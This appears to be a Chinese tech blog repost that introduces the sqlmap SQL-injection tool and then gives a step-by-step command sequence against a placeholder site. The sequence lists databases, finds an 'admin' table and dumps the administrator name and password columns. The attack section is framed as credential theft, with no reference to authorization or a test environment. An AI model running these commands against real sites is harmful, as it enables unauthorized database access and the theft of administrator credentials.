获取字段_技术干货 | 利用sqlmap 获取管理员账号密码

本文介绍了sqlmap这款开源渗透测试工具,用于检测和利用SQL注入漏洞。它支持多种数据库,并涵盖五种注入模式。通过示例展示了如何使用sqlmap获取数据库名、表名、字段名及内容,包括--dbs获取数据库名,--tables获取表名,--columns获取字段名,--dump获取字段内容的实战步骤。
摘要由CSDN通过智能技术生成

b0b05789aa51221c615bb838fa6cf9c4.gif


首先,先简单介绍下sqlmap简介:

sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。

支持的数据库:MySQL,Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。

sqlmap支持五种不同的注入模式:UNION query SQL injection(可联合查询注入
Error-based SQL injection(报错型注入)
Boolean-based blind SQL injection(布尔型注入)
Time-based blind SQL injection(基于时间延迟注入)
Stacked queries SQL injection(可多语句查询注入)基本用法:-u 使用sqlmap
--dbs 获取数据库名
--tables 获取表名
--columns 获取字段名

--dump 获取字段内容实战:1.获取库名  
python2 sqlmap.py -u "http://xxx.com" --dbs

5aa91d51eef47a2e064745de7e7daf36.png

成功获取库名

193c4fe3c9b767995d387f366bd51909.png 

接下来得根据经验,猜他的账户,密码 在哪个库里,或者都进去看看也可以。
2.继续获取表名

python2 sqlmap.py -u "http://xxx.com" -D 库名 --tables

 d81ecfb61c14294fce918d15177cae21.png 

看见admin 看来离目标 不远了

3.获取字段名

python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin --columns

 4b7e8aa2d58382071b8d1ac96e6c8f35.png 

看到admin_name admin _pass  果然就在这
4.获取用户名,密码
python2 sqlmap.py -u "http://xxx.com" -D 库名 -T admin -C admin_name,admin_pass --dump

 6563c10acf2053e2e1ed1beedf05c8ac.png 

本文转自:黑白之道

607cd98ed271ab4390836653b82b958d.png

266376f9b88f9799786cf6a4fb4444ee.png

25e95a4523989dbd7ef0375c8e5b0ec5.png

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值